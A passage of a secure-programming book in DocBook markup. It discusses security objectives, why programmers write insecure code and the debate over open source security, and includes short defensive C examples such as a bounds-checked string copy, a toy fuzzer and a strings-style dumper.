|
||
In any case, it is important to identify your program's overall
|
||
security objectives, no matter how you group them together,
|
||
so that you'll know when you've met them.
|
||
</para>
|
||
|
||
<!-- ???: Reference other classics? Orange Book? CC? See
|
||
http://seclab.cs.ucdavis.edu/projects/history/seminal.html
|
||
|
||
Reference other Computer security websites and issues, including:
|
||
http://www.centralwebs.co.uk/Links/secure.html
|
||
Maximum Security's appendix:
|
||
http://www.uzsci.net/documentation/Books/Max_Security/apa/apa.htm
|
||
|
||
Multi-player games -
|
||
How to Hurt the Hackers: The Scoop on Internet Cheating
|
||
and How You Can Combat It
|
||
By Matt Pritchard
|
||
Gamasutra
|
||
July 24, 2000
|
||
http://www.gamasutra.com/features/20000724/pritchard_pfv.htm
|
||
-->
|
||
|
||
<para>
|
||
Sometimes these objectives are a response to a known set of threats,
|
||
and sometimes some of these objectives are required by law.
|
||
For example, for U.S. banks and other financial institutions,
|
||
there's a new privacy law called the ``Gramm-Leach-Bliley'' (GLB) Act.
|
||
This law mandates disclosure of personal information shared and
|
||
means of securing that data, requires disclosure of personal information
|
||
that will be shared with third parties, and directs institutions to
|
||
give customers a chance to opt out of data sharing.
|
||
[Jones 2000]
|
||
</para>
|
||
|
||
<para>
|
||
There is sometimes conflict between security and some other general
|
||
system/software engineering principles.
|
||
Security can sometimes interfere with ``ease of use''; for example,
|
||
installing a secure configuration may take more effort than a
|
||
``trivial'' installation that works but is insecure.
|
||
Often, this apparent conflict can be resolved; for example, by re-thinking
|
||
a problem it's often possible to make a secure system also easy to use.
|
||
There's also sometimes a conflict between security and abstraction
|
||
(information hiding);
|
||
for example, some high-level library routines may be implemented securely
|
||
or not, but their specifications won't tell you.
|
||
In the end, if your application must be secure, you must do things yourself
|
||
if you can't be sure otherwise - yes, the library should be fixed, but
|
||
it's your users who will be hurt by your poor choice of library routines.
|
||
</para>
|
||
|
||
<para>
|
||
A good general security principle is ``defense in depth'';
|
||
you should have numerous defense mechanisms (``layers'') in place,
|
||
designed so that an attacker has to defeat multiple mechanisms to
|
||
perform a successful attack.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="why-write-insecure">
|
||
<title>Why do Programmers Write Insecure Code?</title>
|
||
<para>
|
||
Many programmers don't intend to write insecure code - but do anyway.
|
||
Here are a number of purported reasons for this.
|
||
Most of these were collected and summarized by Aleph One on Bugtraq
|
||
(in a posting on December 17, 1998):
|
||
<!-- Title: Re: Learning security [SUMMARY] -->
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
There is no curriculum that addresses computer security in most schools.
|
||
Even when there <emphasis>is</emphasis> a computer security curriculum, they
|
||
often don't discuss how to write secure programs as a whole.
|
||
Many such curricula only study certain areas such as
|
||
cryptography or protocols.
|
||
These are important, but they often fail to discuss common real-world issues
|
||
such as buffer overflows, string formatting, and input checking.
|
||
I believe this is one of the most important problems; even those programmers
|
||
who go through colleges and universities are very unlikely to learn
|
||
how to write secure programs, yet we depend on those very people to
|
||
write secure programs.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Programming books/classes do not teach secure/safe programming techniques.
|
||
Indeed, until recently there were no books on how to write secure programs
|
||
at all (this book is one of those few).
|
||
</para></listitem>
|
||
<listitem><para>
|
||
No one uses formal verification methods.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
C is an unsafe language, and the standard C library string functions
|
||
are unsafe.
|
||
This is particularly important because C is so widely used -
|
||
the ``simple'' ways of using C permit dangerous exploits.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Programmers do not think ``multi-user.''
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Programmers are human, and humans are lazy.
|
||
Thus, programmers will often use the ``easy'' approach instead of a
|
||
secure approach - and once it works, they often fail to fix it later.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Most programmers are simply not good programmers.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Most programmers are not security people; they simply don't often
|
||
think like an attacker does.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Most security people are not programmers.
|
||
This was a statement made by some Bugtraq contributors, but it's not clear
|
||
that this claim is really true.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Most computer security models are terrible.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
There is lots of ``broken'' legacy software.
|
||
Fixing this software (to remove security faults or to make it work with
|
||
more restrictive security policies) is difficult.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Consumers don't care about security.
|
||
(Personally, I have hope that consumers are beginning to care about security;
|
||
a computer system that is constantly exploited is neither useful
|
||
nor user-friendly.
|
||
Also, many consumers are unaware that there's
|
||
even a problem, assume that it can't happen to them, or think that
|
||
things cannot be made better.)
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Security costs extra development time.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Security costs in terms of additional testing
|
||
(red teams, etc.).
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
</para>
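
<para>
The point in the list above about the standard C string functions can be
made concrete with a small sketch.
A call such as strcpy(dst, src) keeps writing past the end of dst whenever
src is too long, which is the classic buffer overflow.
The hypothetical helper below, copy_checked (a name invented for this
example, not a library routine), is one possible alternative: it refuses
to copy a string that does not fit rather than overflowing or silently
truncating.
It is only a sketch of the idea, under the assumption that the caller
knows the true size of the destination buffer.
</para>

<programlisting><![CDATA[
```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Copy `src` into `dst`, whose capacity is `dstsize` bytes including the
 * terminating NUL. Returns 0 on success, or -1 (leaving `dst` untouched)
 * if the string would not fit. */
int copy_checked(char *dst, size_t dstsize, const char *src)
{
    size_t len;

    assert(dst != NULL && src != NULL);
    len = strlen(src);
    if (len >= dstsize)
        return -1;              /* reject rather than overflow or truncate */
    memcpy(dst, src, len + 1);  /* len + 1 also copies the NUL */
    return 0;
}
```
]]></programlisting>

<para>
The ``easy'' approach would have been a single strcpy call with no length
check; the extra comparison is the kind of step that tends to be skipped
once a program appears to work.
</para>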
|
||
</sect1>
|
||
|
||
<sect1 id="open-source-security">
|
||
<title>Is Open Source Good for Security?</title>
|
||
|
||
<para>
|
||
There's been a lot of debate by security practitioners
|
||
about the impact of open source approaches on security.
|
||
One of the key issues is that open source exposes the source code
|
||
to examination by everyone, both the attackers and defenders,
|
||
and reasonable people disagree about the ultimate impact of this situation.
|
||
(Note - you can get the latest version of this essay by going to the
|
||
main website for this book,
|
||
<ulink url="http://www.dwheeler.com/secure-programs">
|
||
http://www.dwheeler.com/secure-programs</ulink>.)
|
||
</para>
|
||
|
||
<sect2 id="open-source-security-experts">
|
||
<title>View of Various Experts</title>
|
||
|
||
<para>
|
||
First, let's examine what security experts have to say.
|
||
</para>
|
||
|
||
<para>
|
||
Bruce Schneier is a well-known expert on computer security and cryptography.
|
||
He argues that smart engineers should ``demand
|
||
open source code for anything related to security'' [Schneier 1999],
|
||
and he also discusses some of the preconditions which must be met to make
|
||
open source software secure.
|
||
<!-- http://www.counterpane.com/crypto-gram-0205.html#1
|
||
Probably too detailed...
|
||
A basic rule of cryptography is to use published, public,
|
||
algorithms and protocols.
|
||
This principle was first stated in 1883 by Auguste Kerckhoffs:
|
||
in a well-designed cryptographic system, only the key needs to be secret;
|
||
there should be no secrecy in the algorithm.
|
||
Modern cryptographers have embraced this principle, calling
|
||
anything else "security by obscurity."
|
||
Any system that tries to keep its algorithms secret for security reasons
|
||
is quickly dismissed by the community, and referred to as "snake oil"
|
||
or even worse.
|
||
This is true for cryptography, but the general relationship between secrecy and security is more complicated than Kerckhoffs' Principle indicates. ...
|
||
Kerckhoffs' Principle generalizes to the following design guideline:
|
||
minimize the number of secrets in your security system.
|
||
To the extent that you can accomplish that,
|
||
you increase the robustness of your security.
|
||
To the extent you can't, you increase its fragility.
|
||
-->
|
||
Vincent Rijmen, a developer of the winning Advanced Encryption Standard (AES)
|
||
encryption algorithm, believes that
|
||
the open source nature of Linux
|
||
provides a superior vehicle for making security vulnerabilities easier
|
||
to spot and fix, ``Not only because more people can look at it, but,
|
||
more importantly, because the model forces people to write more clear
|
||
code, and to adhere to standards. This in turn facilitates security review''
|
||
[Rijmen 2000].
|
||
</para>
|
||
|
||
<para>
|
||
Elias Levy (Aleph1) is the former moderator of one of the most
|
||
popular security discussion groups - Bugtraq.
|
||
He discusses some of the problems in making open source
|
||
software secure in his article
|
||
<ulink url="http://www.securityfocus.com/commentary/19">"Is Open Source
|
||
Really More Secure than Closed?"</ulink>.
|
||
His summary is:
|
||
<blockquote>
|
||
<para>
|
||
So does all this mean Open Source Software is no better than closed
|
||
source software when it comes to security vulnerabilities? No. Open
|
||
Source Software certainly does have the potential to be more secure
|
||
than its closed source counterpart.
|
||
But make no mistake, simply being open source is no guarantee of security.
|
||
</para>
|
||
</blockquote>
|
||
</para>
|
||
|
||
<para>
|
||
Whitfield Diffie is the
|
||
co-inventor of public-key cryptography (the basis of all Internet security)
|
||
and chief security officer and senior staff engineer at Sun Microsystems.
|
||
In his 2003 article
|
||
<ulink url="http://zdnet.com.com/2100-1107-980938.html">
|
||
Risky business: Keeping security a secret</ulink>,
|
||
he argues that proprietary vendors' claims that their software
is more secure because it's secret are nonsense.
|
||
He identifies and then counters two main claims made by proprietary vendors:
|
||
(1) that release of code benefits attackers more than anyone else because
|
||
a lot of hostile eyes can also look at open-source code, and
|
||
(2) that a few expert eyes are better than several random ones.
|
||
He first notes that while giving programmers access to a piece of software
|
||
doesn't guarantee they will study it carefully,
|
||
there is a group of programmers who can be expected to care deeply:
|
||
Those who either use the software personally or work for an
|
||
enterprise that depends on it.
|
||
"In fact, auditing the programs on which an enterprise depends for
|
||
its own security is a natural function of the enterprise's own
|
||
information-security organization."
|
||
He then counters the first claim, noting that
|
||
"As for the notion that open source's usefulness to opponents
|
||
outweighs the advantages to users, that argument flies in
|
||
the face of one of the most important principles in security:
|
||
A secret that cannot be readily changed should be regarded as a vulnerability."
|
||
He closes noting that
|
||
<blockquote>
|
||
<para>
|
||
"It's simply unrealistic to depend on secrecy for security in
|
||
computer software.
|
||
You may be able to keep the exact workings of the program out of general
|
||
circulation, but can you prevent the code from being
|
||
reverse-engineered by serious opponents? Probably not."
|
||
</para>
|
||
</blockquote>
|
||
|
||
|
||
</para>
|
||
|
||
<para>
|
||
John Viega's article
|
||
<ulink url="http://dev-opensourceit.earthweb.com/news/000526_security.html">"The Myth of Open Source Security"</ulink> also discusses
|
||
these issues, and summarizes them this way:
|
||
<blockquote>
|
||
<para>
|
||
Open source software projects can be more secure than closed
|
||
source projects. However, the very things that can make open
|
||
source programs secure -- the availability of the source code,
|
||
and the fact that large numbers of users are available to look
|
||
for and fix security holes -- can also lull people into a false
|
||
sense of security.
|
||
</para>
|
||
</blockquote>
|
||
</para>
|
||
|
||
<para>
|
||
<ulink url="http://www.linuxworld.com/linuxworld/lw-1998-11/lw-11-ramparts.html">Michael H. Warfield's "Musings on open source security"</ulink> is
|
||
very positive about the impact of open source software on security.
|
||
In contrast,
|
||
Fred Schneider doesn't believe that open source helps security, saying
|
||
``there is no reason to believe that the many eyes inspecting (open)
|
||
source code would be successful in identifying bugs that allow
|
||
system security to be compromised'' and claiming that
|
||
``bugs in the code are not the dominant means of attack'' [Schneider 2000].
|
||
He also claims that open source rules out control of the construction
|
||
process, though in practice there is such control - all major open source
|
||
programs have one or a few official versions with ``owners'' with
|
||
reputations at stake.
|
||
Peter G. Neumann discusses ``open-box'' software (in which source code
|
||
is available, possibly only under certain conditions), saying
|
||
``Will open-box software really improve system security?
|
||
My answer is not by itself, although the potential is considerable''
|
||
[Neumann 2000].
|
||
TruSecure Corporation, under sponsorship by Red Hat (an open source company),
|
||
has developed a paper on why they believe open source is more
|
||
effective for security [TruSecure 2001].
|
||
<ulink url="http://www-106.ibm.com/developerworks/linux/library/l-oss.html?open&I=252,t=gr,p=SeclmpOS">Natalie Walker Whitlock's IBM DeveloperWorks article</ulink>
|
||
discusses the pros and cons as well.
|
||
Brian Witten, Carl Landwehr, and Michael Caloyannides [Witten 2001]
|
||
published in IEEE Software an article tentatively concluding that
|
||
having source code available should work in the favor of system security;
|
||
they note:
|
||
<blockquote>
|
||
<para>
|
||
``We can draw four additional conclusions from this discussion. First,
|
||
access to source code lets users improve system security -- if they have
|
||
the capability and resources to do so. Second, limited tests indicate that
|
||
for some cases, open source life cycles produce systems that are less
|
||
vulnerable to nonmalicious faults. Third, a survey of three operating
|
||
systems indicates that one open source operating system experienced less
|
||
exposure in the form of known but unpatched vulnerabilities over a 12-month
|
||
period than was experienced by either of two proprietary counterparts.
|
||
Last, closed and proprietary system development models face disincentives
|
||
toward fielding and supporting more secure systems as long as less secure
|
||
systems are more profitable. Notwithstanding these conclusions, arguments
|
||
in this important matter are in their formative stages and in dire need of
|
||
metrics that can reflect security delivered to the customer.''
|
||
</para>
|
||
</blockquote>
|
||
</para>
|
||
|
||
<para>
|
||
Scott A. Hissam and Daniel Plakosh's
|
||
<ulink url="http://www.ics.uci.edu/~wscacchi/Papers/New/IEE_hissam.pdf">
|
||
``Trust and Vulnerability in Open Source Software''</ulink>
|
||
discusses the pluses and minuses of open source software.
|
||
As with other papers, they note that just because the software
|
||
is open to review, it does not automatically follow that
|
||
such a review has actually been performed.
|
||
Indeed, they note that this is a general problem for all software,
|
||
open or closed - it is often questionable if many people examine any
|
||
given piece of software.
|
||
One interesting point is that they demonstrate that
|
||
attackers can learn about a
|
||
vulnerability in a closed source program (Windows)
|
||
from patches made to an OSS/FS program (Linux).
|
||
In this example,
|
||
Linux developers fixed a vulnerability before attackers tried to attack it,
|
||
and attackers correctly surmised that a similar problem might still be in
|
||
Windows (and it was).
|
||
Unless OSS/FS programs are forbidden, this kind of learning is difficult
|
||
to prevent.
|
||
Therefore, the existence of an OSS/FS program can reveal the vulnerabilities
|
||
of both the OSS/FS and proprietary program performing the same function -
|
||
but at least in this example, the OSS/FS program was fixed first.
|
||
</para>
|
||
</sect2>
|
||
|
||
<sect2 id="open-source-security-nohalt">
|
||
<title>Why Closing the Source Doesn't Halt Attacks</title>
|
||
|
||
<para>
|
||
It's been argued that a
|
||
system without source code is more secure because,
|
||
since there's less information available for an attacker, it should
|
||
be harder for an attacker to find the vulnerabilities.
|
||
This argument has a number of weaknesses, however, because
|
||
although source code is extremely important when trying to add
|
||
new capabilities to a program,
|
||
attackers generally don't need source code to find a vulnerability.
|
||
</para>
|
||
|
||
<para>
|
||
First, it's important to distinguish between ``destructive'' acts
|
||
and ``constructive'' acts. In the real world, it is much easier to
|
||
destroy a car than to build one. In the software world, it is
|
||
much easier to find and exploit a vulnerability than to
|
||
add significant new functionality to that software.
|
||
Attackers have many advantages against defenders because of this difference.
|
||
Software developers must try to have no security-relevant mistakes
|
||
anywhere in their code, while attackers only need to find one.
|
||
Developers are primarily paid to get their programs to work...
|
||
attackers don't need to make the program work, they only need to
|
||
find a single weakness. And as I'll describe in a moment, it takes
|
||
less information to attack a program than to modify one.
|
||
</para>
|
||
|
||
<para>
|
||
Generally attackers (against both open and closed programs) start by
|
||
knowing about the general kinds of security problems programs have.
|
||
There's no point in hiding this information; it's already out, and
|
||
in any case, defenders need that kind of information to defend
|
||
themselves.
|
||
Attackers then use techniques to try to find those problems;
|
||
I'll group the techniques into ``dynamic'' techniques (where you
|
||
run the program) and ``static'' techniques (where you examine
|
||
the program's code - be it source code or machine code).
|
||
</para>
|
||
|
||
<para>
|
||
In ``dynamic'' approaches, an attacker runs the program,
|
||
sending it data (often problematic data), and sees
|
||
if the program's response indicates a common vulnerability.
|
||
There is no difference between open and closed programs here, since the attacker isn't
|
||
looking at code.
|
||
|
||
Attackers may also look at the code, the ``static'' approach.
|
||
For open source software, they'll
|
||
probably look at the source code and search it for patterns.
|
||
For closed source software, they might search the machine code
|
||
(usually presented in assembly language format to simplify the
|
||
task) for essentially the same patterns.
|
||
They might also use tools called
|
||
``decompilers'' that turn the machine code back into source code
|
||
and then search the source code for the vulnerable patterns
|
||
(the same way they would search for vulnerabilities in open source software).
|
||
See Flake [2001] for one discussion of how closed code can still be examined
|
||
for security vulnerabilities (e.g., using disassemblers).
|
||
This point is important:
|
||
even if an attacker wanted to use source code to find a vulnerability,
|
||
a closed source program has no advantage, because the attacker
|
||
can use a decompiler to re-create source code for the product.
|
||
</para>
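
<para>
The ``dynamic'' approach described above can be sketched in a few lines of C.
The code below is an assumption-laden toy, not a real attack tool:
fragile_parser is a hypothetical stand-in for a program that trusts a
length byte in its input, and it merely reports where a careless parser
would have read past the end of its buffer, so the demonstration itself
stays memory-safe.
The fuzz function (also a name invented here) throws random inputs at a
target and counts the failures, without ever consulting the target's
source code.
</para>

<programlisting><![CDATA[
```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical target: the first byte claims how many payload bytes
 * follow. Returns 1 where a parser that trusted that byte would read
 * past the end of its input, 0 otherwise. */
int fragile_parser(const unsigned char *data, size_t len)
{
    if (len == 0)
        return 0;
    return (size_t)data[0] > len - 1;
}

/* Small linear congruential generator, used so that runs are repeatable. */
static unsigned long next_random(unsigned long *state)
{
    *state = (*state * 1103515245UL + 12345UL) & 0x7fffffffUL;
    return *state;
}

/* Feed `iterations` random inputs to `target` and return how many of
 * them made it misbehave (that is, return nonzero). */
unsigned fuzz(int (*target)(const unsigned char *, size_t),
              unsigned iterations, unsigned long seed)
{
    unsigned char buf[64];
    unsigned failures = 0;
    unsigned i;
    size_t j, len;

    assert(target != NULL);
    for (i = 0; i < iterations; i++) {
        /* Pick a random length from 0 to sizeof buf, then random bytes. */
        len = (size_t)(next_random(&seed) >> 8) % (sizeof buf + 1);
        for (j = 0; j < len; j++)
            buf[j] = (unsigned char)(next_random(&seed) >> 16);
        if (target(buf, len) != 0)
            failures++;
    }
    return failures;
}
```
]]></programlisting>

<para>
A real attacker would watch for crashes or other anomalous responses from
the running program rather than a return code, but the principle is the
same: only the program's behavior is examined, so it makes no difference
whether its source code is published.
</para>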
|
||
|
||
<para>
|
||
Non-developers might ask ``if decompilers can create source code
|
||
from machine code, then why do developers say they need
|
||
source code instead of just machine code?''
|
||
The problem is that although developers don't need source
|
||
code to find security problems, developers do need source code to make
|
||
substantial improvements to the program.
|
||
Although decompilers can turn machine code back into a
|
||
``source code'' of sorts, the resulting source code
|
||
is extremely hard to modify. Typically most understandable names are
|
||
lost, so instead of variables like ``grand_total'' you get
|
||
``x123123'', instead of methods like ``display_warning'' you get
|
||
``f123124'', and the code itself may have spatterings of
|
||
assembly in it.
|
||
Also, <emphasis>all</emphasis> comments and design information are lost.
|
||
This isn't a serious problem for finding security problems, because
|
||
generally you're searching for patterns indicating vulnerabilities,
|
||
not for internal variable or method names.
|
||
Thus, decompilers can be useful for finding ways to attack programs,
|
||
but aren't helpful for updating programs.
|
||
</para>
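
<para>
To give a feel for the loss of names and comments described above, the
following C sketch shows the same logic twice.
The first function is written the way a developer might write it; the
second is a hand-written imitation of what decompiler output tends to
look like, not the output of any actual tool.
All of the names (sum_line_items, f123124, x123123, and so on) are
invented for this illustration.
</para>

<programlisting><![CDATA[
```c
#include <assert.h>
#include <stddef.h>

/* As the developer wrote it: names and comments carry the intent. */
long sum_line_items(const long *prices, size_t count)
{
    long grand_total = 0;
    size_t i;

    assert(prices != NULL || count == 0);
    for (i = 0; i < count; i++)
        grand_total += prices[i];   /* add each line item to the total */
    return grand_total;
}

/* Hand-written imitation of decompiler output for the same logic:
 * identical behavior, but the names and comments are gone. */
long f123124(const long *a1, size_t a2)
{
    long x123123 = 0;
    size_t v2 = 0;

    while (v2 != a2) {
        x123123 += *(a1 + v2);
        ++v2;
    }
    return x123123;
}
```
]]></programlisting>

<para>
Both versions expose the same loop and the same memory accesses, which is
what someone searching for vulnerable patterns cares about; only the
second is unpleasant to maintain or extend.
</para>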
|
||
|
||
<para>
|
||
Thus, developers will say ``source code is vital''
|
||
(when they intend to add functionality), but the fact that the source
|
||
code for closed source programs is hidden doesn't protect the program
|
||
very much.
|
||
</para>
|
||
|
||
<!--
|
||
Thus, defenders won't usually look for problems if they
|
||
don't have the source code, so not having the source code puts defenders
|
||
at a disadvantage compared to attackers.
|
||
-->
|
||
</sect2>
|
||
|
||
<sect2 id="open-source-security-secrets">
|
||
<title>Why Keeping Vulnerabilities Secret Doesn't Make Them Go Away</title>
|
||
|
||
<para>
|
||
Sometimes it's noted that a vulnerability that exists but is unknown
|
||
can't be exploited, so the system is ``practically secure.''
|
||
In theory this is true, but the problem is that once someone finds
|
||
the vulnerability, the finder may just exploit
|
||
the vulnerability instead of helping to fix it.
|
||
Having unknown vulnerabilities doesn't really make the vulnerabilities go away;
|
||
it simply means that the vulnerabilities are a time bomb, with no
|
||
way to know when they'll be exploited.
|
||
Fundamentally, the problem of someone exploiting a vulnerability they
|
||
discover is a problem for both open and closed source systems.
|
||
</para>
|
||
|
||
<para>
A related claim, though not as directly tied to OSS/FS,
is that people should not post warnings about
vulnerabilities or discuss them.
This sounds good in theory, but attackers already
distribute information about vulnerabilities through a large number
of channels.
In short, such an approach would leave
defenders vulnerable while doing nothing to inhibit attackers.
In the past, companies actively tried to prevent disclosure of vulnerabilities,
but experience showed that, in general, companies didn't fix vulnerabilities
until they were widely known to their users (who could then insist that
the vulnerabilities be fixed).
This is all part of the argument for ``full disclosure.''
Gartner Group has a blunt commentary in a CNET.com article titled
``Commentary: Hype is the real issue - Tech News.''
They stated:
|
||
<blockquote>
|
||
<para>
|
||
The comments of Microsoft's Scott Culp, manager of the company's
|
||
security response center, echo a common refrain in a long, ongoing
|
||
battle over information. Discussions of morality regarding the
|
||
distribution of information go way back and are very familiar. Several
|
||
centuries ago, for example, the church tried to squelch Copernicus'
|
||
and Galileo's theory of the sun being at the center of the solar
|
||
system...
|
||
|
||
Culp's attempt to blame "information security professionals" for the
|
||
recent spate of vulnerabilities in Microsoft products is at best
|
||
disingenuous. Perhaps, it also represents an attempt to deflect
|
||
criticism from the company that built those products...
|
||
|
||
[The] efforts of all parties contribute to a continuous
|
||
process of improvement. The more widely vulnerabilities become known,
|
||
the more quickly they get fixed.
|
||
</para>
|
||
</blockquote>
|
||
<!-- http://technews.netscape.com/news/0-1003-201-7573979-0.html -->
|
||
<!-- Here's the entire text of the article:
|
||
The comments of Microsoft's Scott Culp, manager of the company's
|
||
security response center, echo a common refrain in a long, ongoing
|
||
battle over information. Discussions of morality regarding the
|
||
distribution of information go way back and are very familiar. Several
|
||
centuries ago, for example, the church tried to squelch Copernicus'
|
||
and Galileo's theory of the sun being at the center of the solar
|
||
system, and in the 20th century Darwin's writings about the theory of
|
||
evolution were banned in a number of states in the United States.
|
||
|
||
Culp's attempt to blame "information security professionals" for the
|
||
recent spate of vulnerabilities in Microsoft products is at best
|
||
disingenuous. Perhaps, it also represents an attempt to deflect
|
||
criticism from the company that built those products.
|
||
|
||
Culp has also manufactured some new numbers related to the losses
|
||
suffered by companies because of the vulnerabilities in Microsoft's
|
||
Internet Information Server (IIS). Culp says the losses amount to
|
||
billions of dollars. Gartner believes that hype associated with
|
||
security risks is the real problem, and that companies engaging in
|
||
hype are culpable.
|
||
|
||
Security firms and professionals have already begun to cut back on
|
||
self-serving press releases and hyperbole while they also research and
|
||
discover new vulnerabilities and responsibly disseminate new
|
||
information. Thus, to criticize those contributions to awareness and
|
||
early warning while using unfounded numbers to make a point is a shot
|
||
gone astray in the ongoing battle between information freedom and
|
||
control.
|
||
|
||
In truth, the responsibility for information security falls to the
|
||
entire IT community - - software companies, security firms, businesses
|
||
and individuals. None should shoulder the whole blame for security
|
||
lapses. Rather, the efforts of all parties contribute to a continuous
|
||
process of improvement. The more widely vulnerabilities become known,
|
||
the more quickly they get fixed.
|
||
-->
|
||
|
||
<!--
|
||
http://www.eweek.com/article/0,3658,s%253D701%2526a%253D26875,00.asp
|
||
May 13, 2002
|
||
Allchin: Disclosure May Endanger U.S.
|
||
By Caron Carlson
|
||
|
||
...
|
||
He later acknowledged that some Microsoft code was so flawed it could not be safely disclosed.
|
||
The bold statements and candid admissions were part of Jim Allchin's testimony during two days in court here before Judge Colleen Kollar-Kotelly, who is hearing the case of nine states and the District of Columbia seeking stricter penalties for Microsoft's antitrust behavior.
|
||
Microsoft has already identified at least one protocol and two APIs that it plans to withhold from public disclosure under the security carve-out.
|
||
|
||
The protocol, which is part of Message Queuing, contains a coding mistake that would threaten the security of enterprise systems using it if it were disclosed, Allchin said.
|
||
When pressed for further details, Allchin said he did not want to offer specifics because Microsoft is trying to work on its reputation regarding security. "The fact that I even mentioned the Message Queuing thing bothers me," he said.
|
||
|
||
|
||
Note, however, that Microsoft code has already escaped!
|
||
Besides, it can be trivially disassembled.
|
||
-->
|
||
</para>
|
||
</sect2>
|
||
|
||
<sect2 id="open-source-security-trojans">
|
||
<title>How OSS/FS Counters Trojan Horses</title>
|
||
|
||
|
||
<para>
It's sometimes argued that open source programs, because there's no
enforced control by a single company, permit people to insert Trojan
horses and other malicious code.
Trojan horses can be inserted into open source code, true, but they
can also be inserted into proprietary code.
A disgruntled or bribed employee can insert malicious code, and
in many organizations it's much less likely to be found than in an
open source program.
After all,
no one outside the organization can review the source code, and few
companies review their code internally (or, even if they do, few can
be assured that the reviewed code is actually what is used).
And the notion that a closed-source company can be sued later has little
evidence behind it; nearly all licenses disclaim all warranties, and courts have
generally not held software development companies liable.
</para>
|
||
|
||
<para>
Borland's InterBase server is an interesting case in point.
Some time between 1992 and 1994, Borland inserted an intentional
``back door'' into their database server, ``InterBase''.
This back door allowed any local or remote user to
manipulate any database object and install arbitrary programs, and
in some cases could lead to controlling the machine as ``root''.
This vulnerability stayed in the product for at least six years: no one else
could review the product, and Borland had no incentive to remove the
vulnerability.
Then Borland released its source code in July 2000.
The ``Firebird'' project began working with the source code, and
uncovered this serious security problem
with InterBase in December 2000.
In January 2001, CERT announced the existence of this back door as
<ulink url="http://www.cert.org/advisories/CA-2001-01.html">CERT
advisory CA-2001-01</ulink>.
What's discouraging is that the back door can be easily found simply by
looking at an ASCII dump of the program (a common cracker trick).
Once this problem was found by open source developers reviewing
the code, it was patched quickly.
You could argue that, by keeping the password unknown,
the program stayed safe, and that opening the source made
the program less secure.
I think this is nonsense, since ASCII dumps are trivial to do and well-known
as a standard attack technique, and not all attackers have sudden
urges to announce vulnerabilities; in fact, there's no way to be
certain that this vulnerability has not been exploited many times.
It's clear that after the source was opened, the source code was
reviewed over time, and the vulnerabilities were found and fixed.
One way to characterize this is to say that the original code was
vulnerable, its vulnerabilities became easier to exploit
when it was first made open source,
and then finally these vulnerabilities were fixed.
|
||
<!--
|
||
The 1992-1994 date is from
|
||
http://slashdot.org/articles/01/01/11/1318207.shtml
|
||
The December 2000 and other info is from:
|
||
http://firebird.ibphoenix.com/home.nfs?a=ibphoenix&s=979248432:339&page=starkey
|
||
-->
|
||
</para>
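<para>
To make concrete how little effort an ``ASCII dump'' takes, here is a
minimal sketch in C that prints every run of printable characters found
in a block of bytes, which is roughly what the common strings(1) utility does.
The function name dump_ascii_runs and the four-character minimum are
assumptions made for illustration; nothing here is taken from the
InterBase code or from the tools actually used to examine it.
</para>
<programlisting><![CDATA[
```c
#include <stddef.h>
#include <stdio.h>

/* Minimum run length worth reporting; 4 is an arbitrary choice for this sketch. */
#define MIN_RUN 4

/*
 * Hypothetical helper: scan buf[0..len-1] and write every run of at least
 * MIN_RUN printable ASCII characters to out, one run per line.
 * Returns the number of runs written.
 */
size_t dump_ascii_runs(const unsigned char *buf, size_t len, FILE *out)
{
    size_t runs = 0;
    size_t start = 0;   /* index where the current printable run began */
    size_t i;

    for (i = 0; i <= len; i++) {
        /* Treat the end of the buffer as a non-printable terminator. */
        int printable = (i < len) && buf[i] >= 0x20 && buf[i] <= 0x7e;

        if (printable)
            continue;
        if (i - start >= MIN_RUN) {
            fwrite(buf + start, 1, i - start, out);
            fputc('\n', out);
            runs++;
        }
        start = i + 1;  /* the next run can begin after this byte */
    }
    return runs;
}
```
]]></programlisting>
<para>
Reading an executable into memory and passing it to a function like this
lists any literal strings embedded in it, including a hard-coded account
name or password, which is why hiding such values inside a binary offers
little protection.
</para>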
|
||
</sect2>
|
||
|
||
<sect2 id="open-source-security-other">
|
||
<title>Other Advantages</title>
|
||
|
||
|
||
<para>
The advantages of having source code open extend not just to software
that is being attacked, but also to vulnerability assessment
scanners.
Vulnerability assessment scanners intentionally look for vulnerabilities
in configured systems.
A recent Network Computing evaluation found that the best scanner
(which, among other things, found the most legitimate vulnerabilities)
was Nessus, an open source scanner [Forristal 2001].
</para>
|
||
</sect2>
|
||
|
||
<sect2 id="open-source-security-bottom-line">
|
||
<title>Bottom Line</title>
|
||
|
||
<para>
|
||
So, what's the bottom line?
I personally believe that when a program began as closed source and
is then first made open source, it
often starts out less secure for its users (through exposure of
vulnerabilities), and over time (say a few years) it has
the potential to be much more secure than a closed program.
If the program began as open source software, the public scrutiny is
more likely to improve its security before it's ready for use by
significant numbers of users, but there are several caveats to this
statement (it's not an ironclad rule).
Simply making a program open source doesn't suddenly make it secure,
and being open source does not guarantee security:
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
First, people have to actually review the code.
|
||
This is one of the key points of debate - will people really
|
||
review code in an open source project?
|
||
All sorts of factors can reduce the amount of review:
|
||
being a niche or rarely-used product (where there are few potential reviewers),
|
||
having few developers, and use of a rarely-used computer language.
|
||
Clearly, a program that has a single developer and no other contributors
|
||
of any kind doesn't have this kind of review.
|
||
On the other hand, a program that has a primary author and many other
|
||
people who occasionally examine the code and contribute suggests that there
|
||
are others reviewing the code (at least to create contributions).
|
||
In general, the more reviewers there are, the higher the likelihood
that someone will identify a flaw; this is the basis of the
``many eyeballs'' theory.
|
||
Note that, for example, the OpenBSD project continuously examines
|
||
programs for security flaws, so the components in its innermost parts
|
||
have certainly undergone a lengthy review.
|
||
Since OSS/FS discussions are often held publicly, this level of
|
||
